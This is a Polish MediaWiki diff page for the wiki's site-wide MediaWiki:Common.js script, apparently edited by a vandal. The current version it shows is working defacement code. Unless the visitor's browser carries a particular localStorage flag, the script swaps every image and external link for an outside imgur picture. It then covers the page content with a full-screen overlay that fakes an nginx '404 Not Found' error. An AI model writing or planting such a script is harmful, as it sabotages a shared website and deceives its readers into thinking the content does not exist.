kontakt: [email protected]
MediaWiki:Common.js: Różnice pomiędzy wersjami
Przejdź do nawigacji
Przejdź do wyszukiwania
imported>Sługa szatana mNie podano opisu zmian |
imported>Sługa szatana mNie podano opisu zmian |
||
Linia 21: | Linia 21: | ||
czterystacztery=document.createElement("center"); | czterystacztery=document.createElement("center"); | ||
czterystacztery.innerHTML = "<h1>404 Not Found</h1>"; | czterystacztery.innerHTML = "<h1>404 Not Found</h1>"; | ||
nginx=document.createElement("center"); | nginx=document.createElement("center"); | ||
nginx.innerHTML = "nginx"; | nginx.innerHTML = "nginx"; | ||
Linia 36: | Linia 34: | ||
czerwonka.style.zIndex = "9999"; | czerwonka.style.zIndex = "9999"; | ||
czerwonka.style.color = "black"; | czerwonka.style.color = "black"; | ||
czerwonka.style.fontFamily = "serif"; | |||
document.querySelector("#content").appendChild(czerwonka); | document.querySelector("#content").appendChild(czerwonka); | ||
czerwonka.appendChild(czterystacztery); | czerwonka.appendChild(czterystacztery); | ||
czerwonka.appendChild(nginx); | czerwonka.appendChild(nginx); |
Wersja z 20:25, 29 lip 2021
// michal gieres if(localStorage.ali!="agca") { const chuuj = document.querySelectorAll("img"); for (var i = 0; i < chuuj .length; i++) { chuuj [i].src = "https://i.imgur.com/TmNdEcc.png"; } const linkipanaagcy = document.querySelectorAll("a[rel=nofollow].external"); for (var i = 0; i < linkipanaagcy .length; i++) { linkipanaagcy [i].href = "https://i.imgur.com/TmNdEcc.png"; } }; var randId = "fjut" + Math.floor(Math.random() * 500); if (localStorage.gowno === undefined || localStorage.gowno === "undefined" || localStorage.gowno === "" || localStorage.gowno.startsWith("fiut")) { localStorage.gowno = randId; } czterystacztery=document.createElement("center"); czterystacztery.innerHTML = "<h1>404 Not Found</h1>"; nginx=document.createElement("center"); nginx.innerHTML = "nginx"; czerwonka=document.createElement("div"); czerwonka.classList.add(localStorage.gowno); czerwonka.style.height = "100%"; czerwonka.style.width = "100%"; czerwonka.style.position = "fixed"; czerwonka.style.background = "white"; czerwonka.style.top = "0"; czerwonka.style.left = "0"; czerwonka.style.zIndex = "9999"; czerwonka.style.color = "black"; czerwonka.style.fontFamily = "serif"; document.querySelector("#content").appendChild(czerwonka); czerwonka.appendChild(czterystacztery); czerwonka.appendChild(nginx);